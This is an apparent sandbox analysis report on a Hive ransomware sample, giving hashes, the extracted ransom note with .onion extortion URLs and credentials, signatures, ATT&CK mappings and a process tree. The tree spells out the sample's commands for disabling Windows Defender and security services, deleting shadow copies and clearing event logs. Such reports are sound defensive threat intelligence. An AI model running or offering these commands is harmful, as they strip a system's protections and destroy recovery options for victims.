Overview

overview

10

Static

static

3

VHO-Trojan...33.exe

windows7-x64

10

VHO-Trojan...33.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13/03/2025, 17:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    VHO-Trojan-Ransom.Win32.Hive.dc-d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33.exe

  • Size

    3.3MB

  • MD5

    6c1444d0e1c63881918fdd4d60d54f9d

  • SHA1

    408db71f315ae43204f1a34b6f28c5ac51d5507b

  • SHA256

    d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33

  • SHA512

    bacf08c9d9c93495f01356589249dba5d5b8588acb7f00eb7d92e784875ef9610e37687ff32233c49f862f5564c6cf1fe0643ea8179a3e1be98eec65485525c1

  • SSDEEP

    49152:uVcQjH6VIOIgQFF3KzfKeSQSqFvVqp/kHzQJqEFH1D1R:uVpjK7xWF34fSQSqFvVqpcfE

Score
10/10
hivedefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\wFLb_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: W52KvHE3BsXH Password: LbYFVa6Kw45h4it4UzCU To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.euq5i files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    defense_evasion
  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\VHO-Trojan-Ransom.Win32.Hive.dc-d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33.exe
    "C:\Users\Admin\AppData\Local\Temp\VHO-Trojan-Ransom.Win32.Hive.dc-d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2708
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1268
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2880
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "UI0Detect" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2728
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "VSS" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2792
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "wbengine" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2584
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "WebClient" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2604
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2724
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "NetMsmqActivator" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1776
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SamSs" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2148
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SDRSVC" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1772
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SstpSvc" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2644
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "UI0Detect" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2200
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "VSS" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2396
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "wbengine" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2652
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "WebClient" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:904
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:1940
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1480
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender DisableAntiSpyware settings
      • System Location Discovery: System Language Discovery
      PID:2844
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2852
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:948
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2136
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1920
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2024
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:332
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1748
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
        PID:1756
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2044
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2156
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:632
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3060
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2948
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2000
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:880
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1128
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3044
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2528
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:944
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:828
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1680
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1980
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:356
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:940
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1140
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1640
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        PID:1336
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1092
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies security service
        • System Location Discovery: System Language Discovery
        PID:2352
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1960
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        2⤵
        • System Location Discovery: System Language Discovery
        • Interacts with shadow copies
        PID:1264
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl system
        2⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2112
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl security
        2⤵
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:2116
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl application
        2⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1256
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        wmic.exe SHADOWCOPY /nointeractive
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:556
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        wmic.exe shadowcopy delete
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1000
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1320
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          3⤵
          • Deletes Windows Defender Definitions
          PID:2236
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIOAVProtection $true
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2080
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
        2⤵
          PID:2828
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableRealtimeMonitoring $true
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2576

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      2
      T1059

      PowerShell

      1
      T1059.001

      System Services

      1
      T1569

      Service Execution

      1
      T1569.002

      Windows Management Instrumentation

      1
      T1047

      Persistence

      Create or Modify System Process

      4
      T1543

      Windows Service

      4
      T1543.003

      Privilege Escalation

      Create or Modify System Process

      4
      T1543

      Windows Service

      4
      T1543.003

      Defense Evasion

      Direct Volume Access

      1
      T1006

      Impair Defenses

      4
      T1562

      Disable or Modify Tools

      2
      T1562.001

      Indicator Removal

      3
      T1070

      Clear Windows Event Logs

      1
      T1070.001

      File Deletion

      2
      T1070.004

      Modify Registry

      4
      T1112

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Exfiltration

      Impact

      Inhibit System Recovery

      2
      T1490

      Service Stop

      1
      T1489

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\wFLb_HOW_TO_DECRYPT.txt
        Filesize

        1KB

        MD5

        1ca4bccdc072b810cb3f0080d616317a

        SHA1

        80dea435c073d9b0a2a54a853df4dc058ebd3352

        SHA256

        48f9f649dfdf74a453d0229070bfdadd27c93e014f56cf36992758b70350e169

        SHA512

        fcacc4812f6cd93cb91a5e502fe3571eefba692defdd52f67b55cad3790405535ff156ba87360dcccd86e0766e03ddbd6a1c547b7cd40d1f32ccf7e51dfc4488

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        e0749dfd737ce2b8e8c6d08202578b86

        SHA1

        bc4c7bf0ddf13c27dd871338aa987fbd80d3cce3

        SHA256

        0e181cd011969316df0f80ec6d7daa10130262f6594ac5d5df2cbd4e6468b519

        SHA512

        0a8643f95c6415b4e200a797e9ce31f0cc36ae5d0de2bb8d9addea8bad8e50411d56438b093c30051515a5bf17b3dbc10ffe97cd02d765a3cbec6528343ae120

        Download Submit